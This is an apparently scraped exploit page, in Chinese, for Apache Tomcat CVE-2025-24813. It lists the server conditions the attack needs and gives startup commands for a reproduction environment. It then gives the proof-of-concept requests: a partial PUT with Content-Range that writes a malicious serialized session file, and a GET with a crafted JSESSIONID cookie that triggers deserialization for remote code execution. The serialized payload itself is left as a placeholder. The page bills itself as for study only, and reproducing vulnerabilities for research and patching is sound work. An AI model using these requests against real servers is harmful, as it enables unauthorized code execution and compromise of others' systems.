Exploit for Use of Incorrectly-Resolved Name or Reference in Apache Tomcat CVE-2025-24813

## https://sploitus.com/exploit?id=45B263AC-0306-5E49-A715-EC785AB0157F
## 说明
本仓库是针对 CVE-2025-24813 Tomcat 最新 RCE 复现的环境。

**仅供学习研究使用！**

## 利用条件
- 应用程序启用了DefaultServlet写入功能，该功能默认关闭
- 应用支持了 partial PUT 请求，能够将恶意的序列化数据写入到会话文件中，该功能默认开启
- 应用使用了 Tomcat 的文件会话持久化并且使用了默认的会话存储位置，需要额外配置
- 应用中包含一个存在反序列化漏洞的库，比如存在于类路径下的 commons-collections，此条件取决于业务实现是否依赖存在反序列化利用链的库

**本环境已开启上述复现所需条件**

## 启动 tomcat

Linux:

```bash
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
```

Windows:
```bash
apache-tomcat-9.0.98/bin/catalina.bat run
```

访问：http://127.0.0.1:9001/

<img width="1452" alt="image" src="https://github.com/user-attachments/assets/2fc5508a-906b-4161-b965-ca937de94893" />

## POC

生成一个恶意的序列化文件，使用以下数据包上传，需要注意 Range 的分块值需要与 Length 保持一致，且大于当前文件的长度。

```poc
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}
```



使用如下 poc 触发：
```poc
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
```
<img width="1392" alt="image" src="https://github.com/user-attachments/assets/1d9aa484-d151-45a6-bdff-7952af277c89" />
<img width="1379" alt="image" src="https://github.com/user-attachments/assets/9bacb253-0b76-4f16-9a5a-c123eb6fca73" />

参考：https://forum.butian.net/article/674